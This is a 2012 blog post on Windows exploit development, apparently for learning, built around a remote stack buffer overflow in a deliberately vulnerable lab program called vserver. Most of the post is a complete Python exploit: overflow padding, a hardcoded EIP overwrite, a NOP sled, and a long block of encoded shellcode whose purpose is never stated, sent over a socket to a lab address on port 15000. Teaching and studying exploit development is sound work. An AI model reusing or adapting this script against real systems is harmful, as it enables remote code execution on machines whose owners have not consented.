Wednesday, February 1, 2012

Windows Exploit Development Remote Stack BoF

This time i made a video about basic exploit development process on windows. The target machine is a Windows Server 2003 R2 with DEP disabled running a vulnerable software called vserver.

Basically the vulnerable software is listening on TCP port 15000 waiting for some input and if you provide a string bigger than 15 characters it will crash.

Here is vserver:
- vserver download

Exploit code:
#!/usr/bin/python
#
import socket

junk = b'A' * 54
eip = b'\x81\x42\x38\x77'
nops = b'\x90' * 25
shellcode = b'\xbe\xb6\x17\xb0\xd8\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9'
shellcode += b'\xb1\x4f\x83\xc0\x04\x31\x70\x10\x03\x70\x10\x54\xe2\x4c'
shellcode += b'\x30\x11\x0d\xad\xc1\x41\x87\x48\xf0\x53\xf3\x19\xa1\x63'
shellcode += b'\x77\x4f\x4a\x08\xd5\x64\xd9\x7c\xf2\x8b\x6a\xca\x24\xa5'
shellcode += b'\x6b\xfb\xe8\x69\xaf\x9a\x94\x73\xfc\x7c\xa4\xbb\xf1\x7d'
shellcode += b'\xe1\xa6\xfa\x2f\xba\xad\xa9\xdf\xcf\xf0\x71\xde\x1f\x7f'
shellcode += b'\xc9\x98\x1a\x40\xbe\x12\x24\x91\x6f\x29\x6e\x09\x1b\x75'
shellcode += b'\x4f\x28\xc8\x66\xb3\x63\x65\x5c\x47\x72\xaf\xad\xa8\x44'
shellcode += b'\x8f\x61\x97\x68\x02\x78\xdf\x4f\xfd\x0f\x2b\xac\x80\x17'
shellcode += b'\xe8\xce\x5e\x92\xed\x69\x14\x04\xd6\x88\xf9\xd2\x9d\x87'
shellcode += b'\xb6\x91\xfa\x8b\x49\x76\x71\xb7\xc2\x79\x56\x31\x90\x5d'
shellcode += b'\x72\x19\x42\xfc\x23\xc7\x25\x01\x33\xaf\x9a\xa7\x3f\x42'
shellcode += b'\xce\xd1\x1d\x0b\x23\xef\x9d\xcb\x2b\x78\xed\xf9\xf4\xd2'
shellcode += b'\x79\xb2\x7d\xfc\x7e\xb5\x57\xb8\x11\x48\x58\xb8\x38\x8f'
shellcode += b'\x0c\xe8\x52\x26\x2d\x63\xa3\xc7\xf8\x23\xf3\x67\x53\x83'
shellcode += b'\xa3\xc7\x03\x6b\xae\xc7\x7c\x8b\xd1\x0d\x0b\x8c\x46\x6e'
shellcode += b'\xa4\x10\x92\x06\xb7\x14\x31\xfb\x3e\xf2\x23\x14\x17\xad'
shellcode += b'\xdb\x8d\x32\x25\x7d\x51\xe9\xad\x1e\xc0\x76\x2d\x68\xf9'
shellcode += b'\x20\x7a\x3d\xcf\x38\xee\xd3\x76\x93\x0c\x2e\xee\xdc\x94'
shellcode += b'\xf5\xd3\xe3\x15\x7b\x6f\xc0\x05\x45\x70\x4c\x71\x19\x27'
shellcode += b'\x1a\x2f\xdf\x91\xec\x99\x89\x4e\xa7\x4d\x4f\xbd\x78\x0b'
shellcode += b'\x50\xe8\x0e\xf3\xe1\x45\x57\x0c\xcd\x01\x5f\x75\x33\xb2'
shellcode += b'\xa0\xac\xf7\xc2\xea\xec\x5e\x4b\xb3\x65\xe3\x16\x44\x50'
shellcode += b'\x20\x2f\xc7\x50\xd9\xd4\xd7\x11\xdc\x91\x5f\xca\xac\x8a'
shellcode += b'\x35\xec\x03\xaa\x1f'

sploit = junk + eip + nops + shellcode

print('[+] Data length: ' + str(len(sploit)) + ' bytes')
print('[+] Sending...\n')
print( sploit )

s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect(('192.168.2.9',15000))
s.send( sploit )
s.close()

print('\n[+] Ok')
I don't go into details because there is already an awesome tutorial made by corelanc0d3r that explain perfectly the process of building a stack based overflow exploit.

You can find his tutorial here.

Enjoy the video.



~SecurityObscurity

Reference:
- Corelan Exploit Stack Based Overflows